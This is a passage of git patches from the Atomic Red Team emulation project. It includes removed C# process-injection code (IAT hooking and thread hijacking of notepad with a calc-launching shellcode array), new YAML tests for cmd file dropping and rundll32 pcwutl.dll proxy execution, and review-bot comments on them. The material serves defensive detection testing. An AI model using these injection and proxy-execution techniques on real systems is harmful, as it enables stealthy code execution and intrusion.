- IntPtr shellcodeAddress = VirtualAllocEx(hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
- // Write shellcode to memory
- IntPtr shellcodeBytesWritten = IntPtr.Zero;
- WriteProcessMemory(hProcess,shellcodeAddress,shellcode,shellcode.Length, out shellcodeBytesWritten);
-
- long funcAddress = (long)optionalHeader64.ImageBase + funcOffset;
-
- // Get current value of IAT
- bytesRead = 0;
- byte[] buffer1 = new byte[8];
- ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer1, buffer1.Length, ref bytesRead);
-
- // Get shellcode address
- byte[] shellcodePtr = BitConverter.GetBytes((Int64)shellcodeAddress);
-
- // Modify permissions to allow IAT modification
- uint oldProtect = 0;
- bool protectbool = VirtualProtectEx(hProcess, (IntPtr)funcAddress, shellcodePtr.Length, PAGE_EXECUTE_READWRITE, out oldProtect);
-
- // Modfiy IAT to point to shellcode
- IntPtr iatBytesWritten = IntPtr.Zero;
- bool success = WriteProcessMemory(hProcess, (IntPtr)funcAddress, shellcodePtr, shellcodePtr.Length, out iatBytesWritten);
-
- // Read IAT to confirm new value
- bytesRead = 0;
- byte[] buffer = new byte[8];
- ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer, buffer.Length, ref bytesRead);
-
-
- flag = true;
- break;
- }
- }
- j++;
- }
- }
-
-
- public struct IMAGE_DOS_HEADER
- { // DOS .EXE header
- public UInt16 e_magic; // Magic number
- public UInt16 e_cblp; // Bytes on last page of file
- public UInt16 e_cp; // Pages in file
- public UInt16 e_crlc; // Relocations
- public UInt16 e_cparhdr; // Size of header in paragraphs
- public UInt16 e_minalloc; // Minimum extra paragraphs needed
- public UInt16 e_maxalloc; // Maximum extra paragraphs needed
- public UInt16 e_ss; // Initial (relative) SS value
- public UInt16 e_sp; // Initial SP value
- public UInt16 e_csum; // Checksum
- public UInt16 e_ip; // Initial IP value
- public UInt16 e_cs; // Initial (relative) CS value
- public UInt16 e_lfarlc; // File address of relocation table
- public UInt16 e_ovno; // Overlay number
- public UInt16 e_res_0; // Reserved words
- public UInt16 e_res_1; // Reserved words
- public UInt16 e_res_2; // Reserved words
- public UInt16 e_res_3; // Reserved words
- public UInt16 e_oemid; // OEM identifier (for e_oeminfo)
- public UInt16 e_oeminfo; // OEM information; e_oemid specific
- public UInt16 e_res2_0; // Reserved words
- public UInt16 e_res2_1; // Reserved words
- public UInt16 e_res2_2; // Reserved words
- public UInt16 e_res2_3; // Reserved words
- public UInt16 e_res2_4; // Reserved words
- public UInt16 e_res2_5; // Reserved words
- public UInt16 e_res2_6; // Reserved words
- public UInt16 e_res2_7; // Reserved words
- public UInt16 e_res2_8; // Reserved words
- public UInt16 e_res2_9; // Reserved words
- public UInt32 e_lfanew; // File address of new exe header
- }
-
- [StructLayout(LayoutKind.Sequential)]
- public struct IMAGE_DATA_DIRECTORY
- {
- public UInt32 VirtualAddress;
- public UInt32 Size;
- }
-
- [StructLayout(LayoutKind.Sequential, Pack = 1)]
- public struct IMAGE_OPTIONAL_HEADER32
- {
- public UInt16 Magic;
- public Byte MajorLinkerVersion;
- public Byte MinorLinkerVersion;
- public UInt32 SizeOfCode;
- public UInt32 SizeOfInitializedData;
- public UInt32 SizeOfUninitializedData;
- public UInt32 AddressOfEntryPoint;
- public UInt32 BaseOfCode;
- public UInt32 BaseOfData;
- public UInt32 ImageBase;
- public UInt32 SectionAlignment;
- public UInt32 FileAlignment;
- public UInt16 MajorOperatingSystemVersion;
- public UInt16 MinorOperatingSystemVersion;
- public UInt16 MajorImageVersion;
- public UInt16 MinorImageVersion;
- public UInt16 MajorSubsystemVersion;
- public UInt16 MinorSubsystemVersion;
- public UInt32 Win32VersionValue;
- public UInt32 SizeOfImage;
- public UInt32 SizeOfHeaders;
- public UInt32 CheckSum;
- public UInt16 Subsystem;
- public UInt16 DllCharacteristics;
- public UInt32 SizeOfStackReserve;
- public UInt32 SizeOfStackCommit;
- public UInt32 SizeOfHeapReserve;
- public UInt32 SizeOfHeapCommit;
- public UInt32 LoaderFlags;
- public UInt32 NumberOfRvaAndSizes;
-
- public IMAGE_DATA_DIRECTORY ExportTable;
- public IMAGE_DATA_DIRECTORY ImportTable;
- public IMAGE_DATA_DIRECTORY ResourceTable;
- public IMAGE_DATA_DIRECTORY ExceptionTable;
- public IMAGE_DATA_DIRECTORY CertificateTable;
- public IMAGE_DATA_DIRECTORY BaseRelocationTable;
- public IMAGE_DATA_DIRECTORY Debug;
- public IMAGE_DATA_DIRECTORY Architecture;
- public IMAGE_DATA_DIRECTORY GlobalPtr;
- public IMAGE_DATA_DIRECTORY TLSTable;
- public IMAGE_DATA_DIRECTORY LoadConfigTable;
- public IMAGE_DATA_DIRECTORY BoundImport;
- public IMAGE_DATA_DIRECTORY IAT;
- public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
- public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
- public IMAGE_DATA_DIRECTORY Reserved;
- }
-
- [StructLayout(LayoutKind.Sequential, Pack = 1)]
- public struct IMAGE_OPTIONAL_HEADER64
- {
- public UInt16 Magic;
- public Byte MajorLinkerVersion;
- public Byte MinorLinkerVersion;
- public UInt32 SizeOfCode;
- public UInt32 SizeOfInitializedData;
- public UInt32 SizeOfUninitializedData;
- public UInt32 AddressOfEntryPoint;
- public UInt32 BaseOfCode;
- public UInt64 ImageBase;
- public UInt32 SectionAlignment;
- public UInt32 FileAlignment;
- public UInt16 MajorOperatingSystemVersion;
- public UInt16 MinorOperatingSystemVersion;
- public UInt16 MajorImageVersion;
- public UInt16 MinorImageVersion;
- public UInt16 MajorSubsystemVersion;
- public UInt16 MinorSubsystemVersion;
- public UInt32 Win32VersionValue;
- public UInt32 SizeOfImage;
- public UInt32 SizeOfHeaders;
- public UInt32 CheckSum;
- public UInt16 Subsystem;
- public UInt16 DllCharacteristics;
- public UInt64 SizeOfStackReserve;
- public UInt64 SizeOfStackCommit;
- public UInt64 SizeOfHeapReserve;
- public UInt64 SizeOfHeapCommit;
- public UInt32 LoaderFlags;
- public UInt32 NumberOfRvaAndSizes;
-
- public IMAGE_DATA_DIRECTORY ExportTable;
- public IMAGE_DATA_DIRECTORY ImportTable;
- public IMAGE_DATA_DIRECTORY ResourceTable;
- public IMAGE_DATA_DIRECTORY ExceptionTable;
- public IMAGE_DATA_DIRECTORY CertificateTable;
- public IMAGE_DATA_DIRECTORY BaseRelocationTable;
- public IMAGE_DATA_DIRECTORY Debug;
- public IMAGE_DATA_DIRECTORY Architecture;
- public IMAGE_DATA_DIRECTORY GlobalPtr;
- public IMAGE_DATA_DIRECTORY TLSTable;
- public IMAGE_DATA_DIRECTORY LoadConfigTable;
- public IMAGE_DATA_DIRECTORY BoundImport;
- public IMAGE_DATA_DIRECTORY IAT;
- public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
- public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
- public IMAGE_DATA_DIRECTORY Reserved;
- }
-
- [StructLayout(LayoutKind.Sequential, Pack = 1)]
- public struct IMAGE_FILE_HEADER
- {
- public UInt16 Machine;
- public UInt16 NumberOfSections;
- public UInt32 TimeDateStamp;
- public UInt32 PointerToSymbolTable;
- public UInt32 NumberOfSymbols;
- public UInt16 SizeOfOptionalHeader;
- public UInt16 Characteristics;
- }
-
- [StructLayout(LayoutKind.Explicit)]
- public struct IMAGE_SECTION_HEADER
- {
- [FieldOffset(0)]
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
- public char[] Name;
- [FieldOffset(8)]
- public UInt32 VirtualSize;
- [FieldOffset(12)]
- public UInt32 VirtualAddress;
- [FieldOffset(16)]
- public UInt32 SizeOfRawData;
- [FieldOffset(20)]
- public UInt32 PointerToRawData;
- [FieldOffset(24)]
- public UInt32 PointerToRelocations;
- [FieldOffset(28)]
- public UInt32 PointerToLinenumbers;
- [FieldOffset(32)]
- public UInt16 NumberOfRelocations;
- [FieldOffset(34)]
- public UInt16 NumberOfLinenumbers;
- [FieldOffset(36)]
- public DataSectionFlags Characteristics;
-
- public string Section
- {
- get { return new string(Name); }
- }
- }
-
- [StructLayout(LayoutKind.Sequential)]
- public struct IMAGE_IMPORT_DESCRIPTOR
- {
- public uint OriginalFirstThunk;
- public uint TimeDateStamp;
- public uint ForwarderChain;
- public uint Name;
- public uint FirstThunk;
- }
-
- [StructLayout(LayoutKind.Sequential)]
- public struct IMAGE_BASE_RELOCATION
- {
- public uint VirtualAdress;
- public uint SizeOfBlock;
- }
-
- [Flags]
- public enum DataSectionFlags : uint
- {
-
- Stub = 0x00000000,
-
- }
-
- public static T FromBinaryReader(BinaryReader reader)
- {
- // Read in a byte array
- byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T)));
-
- // Pin the managed memory while, copy it out the data, then unpin it
- GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
- T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
- handle.Free();
-
- return theStructure;
- }
-
-
- public static bool Is32BitHeader(IMAGE_FILE_HEADER fileHeader)
- {
- UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
- return (IMAGE_FILE_32BIT_MACHINE & fileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
- }
-
-
- // Process privileges
- public const int PROCESS_CREATE_THREAD = 0x0002;
- public const int PROCESS_QUERY_INFORMATION = 0x0400;
- public const int PROCESS_VM_OPERATION = 0x0008;
- public const int PROCESS_VM_WRITE = 0x0020;
- public const int PROCESS_VM_READ = 0x0010;
- public const int PROCESS_ALL_ACCESS = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
-
- // Memory permissions
- public const uint MEM_COMMIT = 0x00001000;
- public const uint MEM_RESERVE = 0x00002000;
- public const uint PAGE_READWRITE = 0x04;
- public const uint PAGE_EXECUTE_READWRITE = 0x40;
-
-
- [DllImport("kernel32.dll")]
- public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
-
- [DllImport("kernel32.dll")]
- public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
-
- [DllImport("kernel32.dll")]
- public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);
-
- [DllImport("kernel32.dll")]
- public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
-
- [DllImport("kernel32.dll")]
- public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
-
- [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
- public static extern IntPtr LoadLibrary(string lpFileName);
-
- [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
- public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
-
-}
-
-public class ThreadHijack
-{
- // Import API Functions
- [DllImport("kernel32.dll")]
- public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
-
- [DllImport("kernel32.dll")]
- static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId);
-
- [DllImport("kernel32.dll")]
- static extern uint SuspendThread(IntPtr hThread);
-
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
-
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
-
- [DllImport("kernel32.dll")]
- static extern int ResumeThread(IntPtr hThread);
-
- [DllImport("kernel32", CharSet = CharSet.Auto,SetLastError = true)]
- static extern bool CloseHandle(IntPtr handle);
-
- [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
- static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
-
- [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
- static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect);
-
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
-
- [DllImport("kernel32.dll")]
- static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
-
-
- // Process privileges
- const int PROCESS_CREATE_THREAD = 0x0002;
- const int PROCESS_QUERY_INFORMATION = 0x0400;
- const int PROCESS_VM_OPERATION = 0x0008;
- const int PROCESS_VM_WRITE = 0x0020;
- const int PROCESS_VM_READ = 0x0010;
-
- // Memory permissions
- const uint MEM_COMMIT = 0x00001000;
- const uint MEM_RESERVE = 0x00002000;
- const uint PAGE_READWRITE = 4;
- const uint PAGE_EXECUTE_READWRITE = 0x40;
-
- [Flags]
- public enum ThreadAccess : int
- {
- TERMINATE = (0x0001),
- SUSPEND_RESUME = (0x0002),
- GET_CONTEXT = (0x0008),
- SET_CONTEXT = (0x0010),
- SET_INFORMATION = (0x0020),
- QUERY_INFORMATION = (0x0040),
- SET_THREAD_TOKEN = (0x0080),
- IMPERSONATE = (0x0100),
- DIRECT_IMPERSONATION = (0x0200),
- THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT,
- THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION
- }
-
- public enum CONTEXT_FLAGS : uint
- {
- CONTEXT_i386 = 0x10000,
- CONTEXT_i486 = 0x10000, // same as i386
- CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP
- CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI
- CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS
- CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state
- CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7
- CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions
- CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
- CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
- }
-
- // x86 float save
- [StructLayout(LayoutKind.Sequential)]
- public struct FLOATING_SAVE_AREA
- {
- public uint ControlWord;
- public uint StatusWord;
- public uint TagWord;
- public uint ErrorOffset;
- public uint ErrorSelector;
- public uint DataOffset;
- public uint DataSelector;
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
- public byte[] RegisterArea;
- public uint Cr0NpxState;
- }
-
- // x86 context structure (not used in this example)
- [StructLayout(LayoutKind.Sequential)]
- public struct CONTEXT
- {
- public uint ContextFlags; //set this to an appropriate value
- // Retrieved by CONTEXT_DEBUG_REGISTERS
- public uint Dr0;
- public uint Dr1;
- public uint Dr2;
- public uint Dr3;
- public uint Dr6;
- public uint Dr7;
- // Retrieved by CONTEXT_FLOATING_POINT
- public FLOATING_SAVE_AREA FloatSave;
- // Retrieved by CONTEXT_SEGMENTS
- public uint SegGs;
- public uint SegFs;
- public uint SegEs;
- public uint SegDs;
- // Retrieved by CONTEXT_INTEGER
- public uint Edi;
- public uint Esi;
- public uint Ebx;
- public uint Edx;
- public uint Ecx;
- public uint Eax;
- // Retrieved by CONTEXT_CONTROL
- public uint Ebp;
- public uint Eip;
- public uint SegCs;
- public uint EFlags;
- public uint Esp;
- public uint SegSs;
- // Retrieved by CONTEXT_EXTENDED_REGISTERS
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
- public byte[] ExtendedRegisters;
- }
-
- // x64 m128a
- [StructLayout(LayoutKind.Sequential)]
- public struct M128A
- {
- public ulong High;
- public long Low;
-
- public override string ToString()
- {
- return string.Format("High:{0}, Low:{1}", this.High, this.Low);
- }
- }
-
- // x64 save format
- [StructLayout(LayoutKind.Sequential, Pack = 16)]
- public struct XSAVE_FORMAT64
- {
- public ushort ControlWord;
- public ushort StatusWord;
- public byte TagWord;
- public byte Reserved1;
- public ushort ErrorOpcode;
- public uint ErrorOffset;
- public ushort ErrorSelector;
- public ushort Reserved2;
- public uint DataOffset;
- public ushort DataSelector;
- public ushort Reserved3;
- public uint MxCsr;
- public uint MxCsr_Mask;
-
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
- public M128A[] FloatRegisters;
-
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
- public M128A[] XmmRegisters;
-
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
- public byte[] Reserved4;
- }
-
- // x64 context structure
- [StructLayout(LayoutKind.Sequential, Pack = 16)]
- public struct CONTEXT64
- {
- public ulong P1Home;
- public ulong P2Home;
- public ulong P3Home;
- public ulong P4Home;
- public ulong P5Home;
- public ulong P6Home;
-
- public CONTEXT_FLAGS ContextFlags;
- public uint MxCsr;
-
- public ushort SegCs;
- public ushort SegDs;
- public ushort SegEs;
- public ushort SegFs;
- public ushort SegGs;
- public ushort SegSs;
- public uint EFlags;
-
- public ulong Dr0;
- public ulong Dr1;
- public ulong Dr2;
- public ulong Dr3;
- public ulong Dr6;
- public ulong Dr7;
-
- public ulong Rax;
- public ulong Rcx;
- public ulong Rdx;
- public ulong Rbx;
- public ulong Rsp;
- public ulong Rbp;
- public ulong Rsi;
- public ulong Rdi;
- public ulong R8;
- public ulong R9;
- public ulong R10;
- public ulong R11;
- public ulong R12;
- public ulong R13;
- public ulong R14;
- public ulong R15;
- public ulong Rip;
-
- public XSAVE_FORMAT64 DUMMYUNIONNAME;
-
- [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
- public M128A[] VectorRegister;
- public ulong VectorControl;
-
- public ulong DebugControl;
- public ulong LastBranchToRip;
- public ulong LastBranchFromRip;
- public ulong LastExceptionToRip;
- public ulong LastExceptionFromRip;
- }
-
- public static int Inject()
- {
- // Get target process by name
-
- Process targetProcess = Process.GetProcessesByName("notepad")[0];
-
-
- // Open and Suspend first thread
- ProcessThread pT = targetProcess.Threads[0];
-
- IntPtr pOpenThread = OpenThread(ThreadAccess.THREAD_HIJACK, false, (uint)pT.Id);
- SuspendThread(pOpenThread);
-
- // Get thread context
- CONTEXT64 tContext = new CONTEXT64();
- tContext.ContextFlags = CONTEXT_FLAGS.CONTEXT_FULL;
- if (GetThreadContext(pOpenThread, ref tContext))
- {
-
- }
-
- // WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode
- // Compiled with:
- // nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin
- byte[] payload = new byte[112] {
- 0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
- };
-
- // Once shellcode has executed return to thread original EIP address (mov to rax then jmp to address)
- byte[] mov_rax = new byte[2] {
- 0x48, 0xb8
- };
- byte[] jmp_address = BitConverter.GetBytes(tContext.Rip);
- byte[] jmp_rax = new byte[2] {
- 0xff, 0xe0
- };
-
- // Build shellcode
- byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
- payload.CopyTo(shellcode, 0);
- mov_rax.CopyTo(shellcode, payload.Length);
- jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length);
- jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length);
-
- // OpenProcess to allocate memory
- IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
-
- // Allocate memory for shellcode within process
- IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-
- // Write shellcode within process
- UIntPtr bytesWritten;
- bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)((shellcode.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
-
- // Read memory to view shellcode
- int bytesRead = 0;
- byte[] buffer = new byte[shellcode.Length];
- ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead);
-
- // Set context EIP to location of shellcode
- tContext.Rip=(ulong)allocMemAddress.ToInt64();
-
- // Apply new context to suspended thread
- if(!SetThreadContext(pOpenThread, ref tContext))
- {
-
- }
- if (GetThreadContext(pOpenThread, ref tContext))
- {
-
- }
- // Resume the thread, redirecting execution to shellcode, then back to original process
-
- ResumeThread(pOpenThread);
-
- return 0;
- }
-}
-
-public class Program
-{
- public static void Main()
- {
- //Test One:
- Console.WriteLine("{0}", "#1 ProcessInject");
- ProcessInject.Inject();
- Console.WriteLine("{0}", "ProcessInject Complete");
- //Test Two:
- Console.WriteLine("{0}", "#2 ApcInjectionAnyProcess");
- ApcInjectionAnyProcess.Inject();
- Console.WriteLine("{0}", "ApcInjectionAnyProcess Complete");
- //Test Three:
- Console.WriteLine("{0}", "#3 ApcInjectionNewProcess");
- ApcInjectionNewProcess.Inject();
- Console.WriteLine("{0}", "ApcInjectionNewProcess Complete");
- //Test Four:
- Console.WriteLine("{0}", "#4 IatInjection");
- IatInjection.Inject();
- Console.WriteLine("{0}", "IatInjection Complete");
- //Test Five:
- Console.WriteLine("{0}", "#5 ThreadHijack");
- ThreadHijack.Inject();
- Console.WriteLine("{0}", "ThreadHijack Complete ");
-
- }
-
-}
diff --git a/atomics/T1055/src/x64/T1055-macrocode.txt b/atomics/T1055/src/x64/T1055-macrocode.txt
old mode 100644
new mode 100755
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index 6f1466e53e..f02cda77d8 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
@@ -31,3 +31,23 @@ atomic_tests:
cleanup_command: |
Remove-Item #{script_path} -Force -ErrorAction Ignore
name: powershell
+- name: Writes text to a file and displays it.
+ description: |
+ Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_contents_path:
+ description: Path to the file that the command prompt will drop.
+ type: path
+ default: '%TEMP%\test.bin'
+ message:
+ description: Message that will be written to disk and then displayed.
+ type: string
+ default: 'Hello from the Windows Command Prompt!'
+ executor:
+ command: |
+ echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
+ cleanup_command: |
+ del "#{file_contents_path}"
+ name: command_prompt
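Review bot: The executor command of the new test stores the surrounding double quotes in the file, because cmd's `echo` does not strip them — `echo "Hello" > file` writes `"Hello"` — and a `message` value containing a `"` or `&` ends the quoted span and is parsed as further command syntax, so the description should say so or the quotes around `#{message}` should go. The `&` between `echo` and `type` also runs `type` even when the redirect fails; `&&` would make a failed write visible in the output. In `cleanup_command`, `del "#{file_contents_path}"` prints an error when the file was never created; `del /f /q "#{file_contents_path}" >nul 2>&1` is quiet and matches the `-ErrorAction Ignore` style of the PowerShell test in the context lines above.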
diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml
index 9ecbd14597..1ca8e29188 100644
--- a/atomics/T1218.011/T1218.011.yaml
+++ b/atomics/T1218.011/T1218.011.yaml
@@ -155,4 +155,19 @@ atomic_tests:
command: |
rundll32.exe url.dll,OpenURL PathToAtomicsFolder\T1218.011\src\index.hta
rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteullen.vbs
+ name: command_prompt
+
+- name: Launches an executable using Rundll32 and pcwutl.dll
+ description: |
+ Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.
+ supported_platforms:
+ - windows
+ input_arguments:
+ exe_to_launch:
+ description: Path of the executable to launch
+ type: path
+ default: '%windir%\System32\notepad.exe'
+ executor:
+ command: |
+ rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
name: command_prompt
\ No newline at end of file
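Review bot: The new pcwutl.dll test has no `cleanup_command`, so the launched executable (notepad.exe by default) is left running after the atomic finishes; `cleanup_command: taskkill /f /im notepad.exe >nul 2>&1` would cover the default value, although it will not match a caller-supplied `exe_to_launch`. `#{exe_to_launch}` is also passed unquoted, so a path containing spaces is split at the first space; wrapping it in double quotes is the usual fix, assuming LaunchApplication accepts a quoted argument, which I have not verified. The hunk keeps the file's missing trailing newline, which is harmless but worth fixing while the file is being edited.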
From 4803288632d94f23aa9e32be92c70160726e8a34 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator
Date: Sat, 13 Mar 2021 14:24:31 +0000
Subject: [PATCH 4/7] Generate GUIDs from
job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
atomics/T1059.003/T1059.003.yaml | 1 +
atomics/T1218.011/T1218.011.yaml | 1 +
atomics/used_guids.txt | 2 ++
3 files changed, 4 insertions(+)
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index f02cda77d8..cbe28a3f9b 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
@@ -32,6 +32,7 @@ atomic_tests:
Remove-Item #{script_path} -Force -ErrorAction Ignore
name: powershell
- name: Writes text to a file and displays it.
+ auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e
description: |
Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
supported_platforms:
diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml
index 1ca8e29188..5289ed4f05 100644
--- a/atomics/T1218.011/T1218.011.yaml
+++ b/atomics/T1218.011/T1218.011.yaml
@@ -158,6 +158,7 @@ atomic_tests:
name: command_prompt
- name: Launches an executable using Rundll32 and pcwutl.dll
+ auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676
description: |
Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.
supported_platforms:
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 2d62cd2ed0..10a681e80f 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -663,3 +663,5 @@ ab042179-c0c5-402f-9bc8-42741f5ce359
7a91ad51-e6d2-4d43-9471-f26362f5738e
913c0e4e-4b37-4b78-ad0b-90e7b25010f6
9c6bdb34-a89f-4b90-acb1-5970614c711b
+127b4afe-2346-4192-815c-69042bec570e
+9f5d081a-ee5a-42f9-a04e-b7bdc487e676
From 396ea73b70e1574eef1a99ef6601db1683ec3f97 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Sat, 13 Mar 2021 14:24:38 +0000
Subject: [PATCH 5/7] Generate docs from job=generate_and_commit_guids_and_docs
branch=master [skip ci]
---
.../art-navigator-layer-windows.json | 2 +-
.../art-navigator-layer.json | 2 +-
atomics/Indexes/Indexes-CSV/index.csv | 14 +-
atomics/Indexes/Indexes-CSV/windows-index.csv | 14 +-
atomics/Indexes/Indexes-Markdown/index.md | 18 +-
.../Indexes/Indexes-Markdown/windows-index.md | 18 +-
atomics/Indexes/Matrices/matrix.md | 4 +-
atomics/Indexes/Matrices/windows-matrix.md | 4 +-
atomics/Indexes/index.yaml | 189 +++++++++++-------
atomics/T1055.001/T1055.001.md | 62 ++++++
atomics/T1055/T1055.md | 57 +-----
atomics/T1059.003/T1059.003.md | 36 ++++
atomics/T1218.011/T1218.011.md | 31 +++
13 files changed, 292 insertions(+), 159 deletions(-)
create mode 100644 atomics/T1055.001/T1055.001.md
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 68c3819223..0e8c068e0f 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
